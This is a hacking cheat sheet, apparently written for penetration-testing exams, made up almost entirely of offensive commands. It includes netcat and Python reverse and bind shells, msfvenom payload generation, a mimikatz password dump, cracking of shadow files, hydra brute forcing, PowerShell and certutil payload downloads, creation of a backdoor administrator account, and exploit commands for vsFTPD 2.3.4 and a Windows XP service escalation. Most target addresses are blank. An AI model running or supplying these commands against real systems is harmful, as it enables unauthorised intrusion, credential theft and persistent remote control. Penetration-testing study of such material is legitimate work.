Hacking cheatsheet

Hacking command list


Connect to port
nc -nv 110
Bind port and connect to:
nc -nlvp 4444
nc -nv 4444
Copy files
nc -nlvp 4444 > dest-file
nc -nv 4444 < local-file
Bind shell and remote execution
nc -nlvp 4444 -e cmd.exe
nc -nv 4444
Reverse shell
nc -nlvp 4444
nc -nv 4444 -e /bin/bash
Scan ports
nc -nvv -w 1 -z 3388-3390


Bind shell SSL with allow IP address
ncat --exec cmd.exe --allow -vnl 4444 --ssl
ncat -v 4444 --ssl
Reverse shell SSL
ncat -vnl 4444 --ssl
ncat -nv 4444 --ssl --exec /bin/bash


Load a .pcap file
tcpdump -r file.pcap
Filter by source host
tcpdump -n src host
Filter by destination host
tcpdump -n dst host
Filter by port
tcpdump -n port 80
Print packet data in HEX and ASCI
tcpdump -nXX
Packets with ACK or PSH flags set
tcpdump -A -n 'tcp[13] = 24'
Print HEX data on an 1500 MTU card
tcpdump -i tap0 -nXX -s 1500 port 110

The harvester

Search all sources for email
theharvester -d -b all
Search employees on linkedin
theharvester -d -b linkedin
Search emails and query hosts in shodan
theharvester -d -b bing -h


Find name servers
host -t ns
Find mail servers
host -t mx
Find address and mail servers
Reverse lookup
Transfer DNS zone
host -l
Try all NS DNS zone transfer; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done


Try DNS zone transfer
dnsrecon -d -t axfr


Enumerate host in a domain


TCP syn/ack scan
nmap -sT
Scan all ports
nmap -sS -p-
Identify host in the network (ICMP)
nmap -sn -v -oG host.txt
Scan port 80 on all hosts
nmap -p 80 -oG web-host.txt
OS, port, version, traceroute and script scan of top 20 port in a range
nmap -sT -A -top-ports=20 -oG top-ports.txt
OS scan
nmap -O
Service Version scan
nmap -sV -sT
Script discover nsb and host version
nmap -p 139,445 --script smb-os-discovery.nse
Script DNS zone transfer
nmap --script dns-zone-transfer -p 53
Scan for smb services (139-netbios,445-microsoft-ds)
nmap -v -p 139,445 -oG smb.txt
Enum http path
nmap -v -p 80 --script http-enum.ns


Discover SMB hosts in a network, get IP, NetBIOS name and users
nbtscan -r
Discover SMB host info
enum4linux -a
Search specific vulnerability
nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1
Enumerate shares
nmap --script smb-enum-shares -p139,445 -T4
Map smb shares
smbmap -H -u guest
Mount share
mount -t cifs -o vers=1.0,username=guest,password="" // /tmp/path


Connect smtp
nc -nv 25
# Check if user exists
VRFY root


  • Port: 161
  • Type: UDP
Scan strings [community, public, manager, etc]
onesixtyone -c snmp_strings.txt
Enumerate MIB tree
snmpwalk -c public -v1
Enumerate some SMTP OID
snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>


PHP reverse shell
msfvenom -p php/reverse_php LHOST= LPORT=443 -f raw > shell.php
Windows bind port (No firewall enabled)
msfvenom -p windows/shell_bind_tcp R LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Microsoft ASP .net reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4445 -f asp > shell.asp
Create windows executable
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe

GCC / compilation

Regular compilation
gcc -o OpenFuck 47080.c -lcrypto
Cross compile x86 in x86_64 host
gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
gcc -m32 -Wl,--hash-style=both -o udev udev.c


Analise web with default settings
nikto -host


Scan web service directories and files
Scan non recursively, non show attempts and bigger words list
dirb /usr/share/dirb/wordlists/big.txt -r -S


Non interactive FTP download from windows
echo open 21 > ftp.txt
echo USER xnaaro >> ftp.txt
echo 12345>> ftp.txt
echo bin >> ftp.txt
echo GET wget.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt


Non interactive hash dump
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit


Create a python webserver
python -m SimpleHTTPServer 80


python --attack 2 --victim --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON

NoSQl user/pass enum

# Git repository:
python3 -u http://localhost/index.php -up email -pp password -ep password -m POST


Search exploit
searchsploit <name>
See exploit code
searchsploit -x /path/exploit
Copy exploit current location
searchsploit -m path/exploit

John the ripper

Merge passwd and shadow files
unshadow /etc/passwd /etc/shadow > unshadow.txt
Crack passwords
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pass.txt
Crack SSH key passphrase
/usr/share/john/ id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Mutate cewl dictionary
john --wordlist=cewl_words.txt --rules --stdout > mutated_words


Crack linux passwords
hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force

File inclusion

LFI example


Python interactive bash shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && export SHELL=bash
Scape restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'


Non interactive queries
mysql -u <user> -p<passwd> -D otrs -e "show databases;"


Crawl robots txt as a search engine agent
curl --user-agent Googlebot -v


Generate passwds from web words
cewl -m 2 -w output
Brute force logging
hydra -L usernames.txt -P passwords.txt <IP> <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail"
# Example
hydra -L usernames -P output http-post-form "/otrs/^USER^&Password=^PASS^:F=Login"



Silent fuzzing
ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u


$ whatweb [200 OK] Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[BadHTTPServer], IP[], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]

Windows commands

Create admin user with RDP
net user xnaaro 12345 /add
net localgroup administrators xnaaro /add
net localgroup "Remote Desktop Users" xnaaro /add
Quick local enumeration
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"


Download file with powershell
  • Option 1
echo (New-Object System.Net.WebClient).DownloadFile("", "wget.exe") > wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  • Option 2
PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('','wget.exe')
Non interactive download
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "" >>wget.ps1
echo $file = "wget.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Download file with certutil
certutil -urlcache -split -f "" wget.exe

Windows exploit suggester

Copy systeminfo to local host
./ --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo

Well know exploits

Common vulnerabilities

vsFTPD 2.3.4

Exploit and reverse shell
python3 21 "sh -c 'nc -nv 44444 -e /bin/bash > /dev/null 2>&1 &'"

Windows XP SP1 priv escalation

sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10000 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost